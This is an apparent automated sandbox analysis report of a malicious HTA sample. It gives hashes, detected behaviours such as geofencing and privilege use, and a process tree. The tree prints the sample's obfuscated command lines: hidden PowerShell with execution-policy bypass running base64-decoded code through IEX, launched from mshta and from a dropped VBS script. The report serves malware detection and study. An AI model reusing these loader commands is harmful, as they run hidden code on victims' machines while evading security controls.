Analysis
max time kernel: 148s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 14-11-2024 02:04
Static task: static1
Behavioral task: behavioral1
  Sample: 0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7.hta
  Resource: win7-20241010-en
Behavioral task: behavioral2
  Sample: 0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7.hta
  Resource: win10v2004-20241007-en
General
Target: 0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7.hta
Size: 207KB
MD5: 1cc49542b6408627091678140cb916c9
SHA1: 66e198338df798a6ef051a71feee749bae890a6d
SHA256: 0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7
SHA512: 1a0a432d112a5f2091c25a629c4a345bd0977207d4451b1581d0b1bdab2375b38207d0e760a56d595fcc975b9d708b897347a7d5a408f1a13c53965d23e9314b
SSDEEP: 96:43F97yT4lwyT4lYv7eZ9emfyFX4T4lTfQ:43F1yT4myT4Kv7eOkyd4T4dQ
Malware Config
Signatures

Blocklisted process makes network request (1 IoC)
  Processes: pOWeRSheLl.EXE
  flow | pid  | Process
  15   | 2140 | pOWeRSheLl.EXE

Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)
  Run Powershell and hide display window.
  Processes: powershell.exe, powershell.exe
  pid  | Process
  3136 | powershell.exe
  3260 | powershell.exe

Evasion via Device Credential Deployment (2 IoCs)
  Processes: pOWeRSheLl.EXE, powershell.exe
  pid  | Process
  2140 | pOWeRSheLl.EXE
  2312 | powershell.exe

Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes: mshta.exe, WScript.exe
  description       | ioc                                                                                                    | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | mshta.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | WScript.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTP, 8 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Processes: WScript.exe, powershell.exe, powershell.exe, mshta.exe, pOWeRSheLl.EXE, powershell.exe, csc.exe, cvtres.exe
  description | ioc                                                         | Process
  Key opened  | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WScript.exe
  Key opened  | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
  Key opened  | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
  Key opened  | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | mshta.exe
  Key opened  | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | pOWeRSheLl.EXE
  Key opened  | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
  Key opened  | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | csc.exe
  Key opened  | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cvtres.exe

Modifies registry class (1 IoC)
  Processes: pOWeRSheLl.EXE
  description | ioc                                                                               | Process
  Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings | pOWeRSheLl.EXE

Suspicious behavior: EnumeratesProcesses (7 IoCs)
  Processes: pOWeRSheLl.EXE, powershell.exe, powershell.exe, powershell.exe
  pid  | Process
  2140 | pOWeRSheLl.EXE
  2140 | pOWeRSheLl.EXE
  2312 | powershell.exe
  2312 | powershell.exe
  3136 | powershell.exe
  3136 | powershell.exe
  3260 | powershell.exe

Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes: pOWeRSheLl.EXE, powershell.exe, powershell.exe, powershell.exe
  description             | pid  | Process
  Token: SeDebugPrivilege | 2140 | pOWeRSheLl.EXE
  Token: SeDebugPrivilege | 2312 | powershell.exe
  Token: SeDebugPrivilege | 3136 | powershell.exe
  Token: SeDebugPrivilege | 3260 | powershell.exe

Suspicious use of WriteProcessMemory (21 IoCs; each row below was reported 3 times)
  Processes: mshta.exe, pOWeRSheLl.EXE, csc.exe, WScript.exe, powershell.exe
  description                      | pid  | Process        | procid_target
  PID 2484 wrote to memory of 2140 | 2484 | mshta.exe      | 86
  PID 2140 wrote to memory of 2312 | 2140 | pOWeRSheLl.EXE | 88
  PID 2140 wrote to memory of 1888 | 2140 | pOWeRSheLl.EXE | 93
  PID 1888 wrote to memory of 3180 | 1888 | csc.exe        | 94
  PID 2140 wrote to memory of 396  | 2140 | pOWeRSheLl.EXE | 96
  PID 396 wrote to memory of 3136  | 396  | WScript.exe    | 97
  PID 3136 wrote to memory of 3260 | 3136 | powershell.exe | 101
Processes (process tree; indentation shows parent/child depth)

C:\Windows\SysWOW64\mshta.exe
  Command line: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  PID: 2484
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE
    Command line: "C:\Windows\SysTeM32\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE" "powersheLL.Exe -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe ; IEx($(IEX('[SySTem.tEXT.eNcodINg]'+[cHAR]58+[cHar]58+'UTf8.gEtSTrinG([SYSTEm.CONvErt]'+[ChAR]0X3A+[cHar]58+'FrOmbaSe64sTrINg('+[chaR]0X22+'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'+[ChAr]34+'))')))"
    PID: 2140
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe
      PID: 2312
      - Evasion via Device Credential Deployment
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5v1l4tli\5v1l4tli.cmdline"
      PID: 1888
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8685.tmp" "c:\Users\Admin\AppData\Local\Temp\5v1l4tli\CSC5037BC2A632742CDA51A1F19327138D.TMP"
        PID: 3180
        - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\WScript.exe
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestoptionstounderstandfastthingstobeget.vbS"
      PID: 396
      - Checks computer location settings
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        PID: 3136
        - Command and Scripting Interpreter: PowerShell
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
          PID: 3260
          - Command and Scripting Interpreter: PowerShell
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads